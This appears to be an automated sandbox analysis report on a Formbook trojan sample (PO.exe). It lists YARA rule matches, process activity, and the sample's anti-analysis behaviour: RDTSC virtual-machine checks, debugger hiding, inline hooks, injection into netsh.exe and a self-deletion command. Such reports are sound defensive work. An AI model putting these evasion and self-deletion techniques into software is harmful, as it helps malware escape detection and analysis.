          Source: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.314657268.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.314657268.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@2/1
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3064
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2F6.tmpJump to behavior
          Source: PO.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO.exeVirustotal: Detection: 38%
          Source: PO.exeReversingLabs: Detection: 10%
          Source: C:\Users\user\Desktop\PO.exeFile read: C:\Users\user\Desktop\PO.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\PO.exe C:\Users\user\Desktop\PO.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3064 -s 1204
          Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe C:\Users\user\Desktop\PO.exeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'Jump to behavior
          Source: C:\Users\user\Desktop\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\PO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: PO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: PO.exeStatic file information: File size 2490880 > 1048576
          Source: PO.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x25fe00
          Source: PO.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: System.Core.ni.pdbRSDSD source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: System.Xml.ni.pdb source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.297582675.000000000E6C0000.00000002.00000001.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000003.00000003.267283620.00000000010B0000.00000004.00000001.sdmp, netsh.exe, 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO.exe, 00000003.00000003.267283620.00000000010B0000.00000004.00000001.sdmp, netsh.exe
          Source: Binary string: System.Configuration.ni.pdb source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: System.Configuration.pdb source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: Microsoft.VisualBasic.pdb*p@# source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: System.Xml.pdb source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: System.pdb source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.297582675.000000000E6C0000.00000002.00000001.sdmp
          Source: Binary string: System.Xml.pdbH'g source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: System.Core.ni.pdb source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: Microsoft.VisualBasic.pdb source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: System.Windows.Forms.pdb source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: mscorlib.pdb source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: System.Core.pdb9 source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: netsh.pdb source: PO.exe, 00000003.00000002.315870877.0000000002F30000.00000040.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: netsh.pdbGCTL source: PO.exe, 00000003.00000002.315870877.0000000002F30000.00000040.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: System.Core.pdb source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: System.Xml.ni.pdbRSDS source: WERD2F6.tmp.dmp.5.dr
          Source: Binary string: System.ni.pdb source: WERD2F6.tmp.dmp.5.dr
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041D0D2 push eax; ret 3_2_0041D0D8
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041D0DB push eax; ret 3_2_0041D142
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0040D8E6 push ecx; retf 3_2_0040D8EE
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041D085 push eax; ret 3_2_0041D0D8
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0041D13C push eax; ret 3_2_0041D142
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0040EC2D push edx; iretd 3_2_0040EC2F
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_006F0218 push AA20259Ch; retn 0000h3_2_006F02C5
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_006F02C8 push B120259Ch; retn 0000h3_2_006F0313
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0371D0D1 push ecx; ret 16_2_0371D0E4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DCD0DB push eax; ret 16_2_02DCD142
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DCD0D2 push eax; ret 16_2_02DCD0D8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DBD8E6 push ecx; retf 16_2_02DBD8EE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DCD085 push eax; ret 16_2_02DCD0D8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DCD13C push eax; ret 16_2_02DCD142
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_02DBEC2D push edx; iretd 16_2_02DBEC2F

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xE7
          Source: C:\Windows\SysWOW64\WerFault.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicketJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002DB98E4 second address: 0000000002DB98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002DB9B5E second address: 0000000002DB9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_00409A90 rdtsc 3_2_00409A90
          Source: C:\Windows\explorer.exe TID: 3596Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 1328Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: explorer.exe, 00000006.00000000.286114617.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.286114617.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000006.00000000.285548658.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000006.00000000.285912938.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.280827283.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000006.00000000.286114617.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000006.00000000.286114617.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000000.286194290.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000006.00000000.280856309.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000006.00000000.285548658.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.285548658.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000006.00000000.285548658.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\PO.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\PO.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\PO.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\PO.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\PO.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\PO.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\PO.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\PO.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\PO.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_00409A90 rdtsc 3_2_00409A90
          Source: C:\Users\user\Desktop\PO.exeCode function: 3_2_0040ACD0 LdrLoadDll,3_2_0040ACD0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CDB60 mov ecx, dword ptr fs:[00000030h]16_2_036CDB60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036DFF60 mov eax, dword ptr fs:[00000030h]16_2_036DFF60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03798F6A mov eax, dword ptr fs:[00000030h]16_2_03798F6A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F3B7A mov eax, dword ptr fs:[00000030h]16_2_036F3B7A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F3B7A mov eax, dword ptr fs:[00000030h]16_2_036F3B7A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03798B58 mov eax, dword ptr fs:[00000030h]16_2_03798B58
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CDB40 mov eax, dword ptr fs:[00000030h]16_2_036CDB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036DEF40 mov eax, dword ptr fs:[00000030h]16_2_036DEF40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036CF358 mov eax, dword ptr fs:[00000030h]16_2_036CF358
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C4F2E mov eax, dword ptr fs:[00000030h]16_2_036C4F2E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036C4F2E mov eax, dword ptr fs:[00000030h]16_2_036C4F2E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FE730 mov eax, dword ptr fs:[00000030h]16_2_036FE730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FA70E mov eax, dword ptr fs:[00000030h]16_2_036FA70E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FA70E mov eax, dword ptr fs:[00000030h]16_2_036FA70E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0378131B mov eax, dword ptr fs:[00000030h]16_2_0378131B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0375FF10 mov eax, dword ptr fs:[00000030h]16_2_0375FF10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0375FF10 mov eax, dword ptr fs:[00000030h]16_2_0375FF10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0379070D mov eax, dword ptr fs:[00000030h]16_2_0379070D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0379070D mov eax, dword ptr fs:[00000030h]16_2_0379070D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036EF716 mov eax, dword ptr fs:[00000030h]16_2_036EF716
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037037F5 mov eax, dword ptr fs:[00000030h]16_2_037037F5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036EDBE9 mov eax, dword ptr fs:[00000030h]16_2_036EDBE9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F03E2 mov eax, dword ptr fs:[00000030h]16_2_036F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F03E2 mov eax, dword ptr fs:[00000030h]16_2_036F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F03E2 mov eax, dword ptr fs:[00000030h]16_2_036F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F03E2 mov eax, dword ptr fs:[00000030h]16_2_036F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F03E2 mov eax, dword ptr fs:[00000030h]16_2_036F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F03E2 mov eax, dword ptr fs:[00000030h]16_2_036F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037453CA mov eax, dword ptr fs:[00000030h]16_2_037453CA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_037453CA mov eax, dword ptr fs:[00000030h]16_2_037453CA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F4BAD mov eax, dword ptr fs:[00000030h]16_2_036F4BAD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F4BAD mov eax, dword ptr fs:[00000030h]16_2_036F4BAD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F4BAD mov eax, dword ptr fs:[00000030h]16_2_036F4BAD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03795BA5 mov eax, dword ptr fs:[00000030h]16_2_03795BA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03747794 mov eax, dword ptr fs:[00000030h]16_2_03747794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03747794 mov eax, dword ptr fs:[00000030h]16_2_03747794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03747794 mov eax, dword ptr fs:[00000030h]16_2_03747794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D1B8F mov eax, dword ptr fs:[00000030h]16_2_036D1B8F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D1B8F mov eax, dword ptr fs:[00000030h]16_2_036D1B8F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0378138A mov eax, dword ptr fs:[00000030h]16_2_0378138A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0377D380 mov ecx, dword ptr fs:[00000030h]16_2_0377D380
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036F2397 mov eax, dword ptr fs:[00000030h]16_2_036F2397
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D8794 mov eax, dword ptr fs:[00000030h]16_2_036D8794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036FB390 mov eax, dword ptr fs:[00000030h]16_2_036FB390
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036D766D mov eax, dword ptr fs:[00000030h]16_2_036D766D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0370927A mov eax, dword ptr fs:[00000030h]16_2_0370927A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0377B260 mov eax, dword ptr fs:[00000030h]16_2_0377B260
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_0377B260 mov eax, dword ptr fs:[00000030h]16_2_0377B260
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03798A62 mov eax, dword ptr fs:[00000030h]16_2_03798A62
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036EAE73 mov eax, dword ptr fs:[00000030h]16_2_036EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036EAE73 mov eax, dword ptr fs:[00000030h]16_2_036EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036EAE73 mov eax, dword ptr fs:[00000030h]16_2_036EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036EAE73 mov eax, dword ptr fs:[00000030h]16_2_036EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_036EAE73 mov eax, dword ptr fs:[00000030h]16_2_036EAE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 16_2_03754257 mov eax, dword ptr fs:[00000030h]16_2_03754257
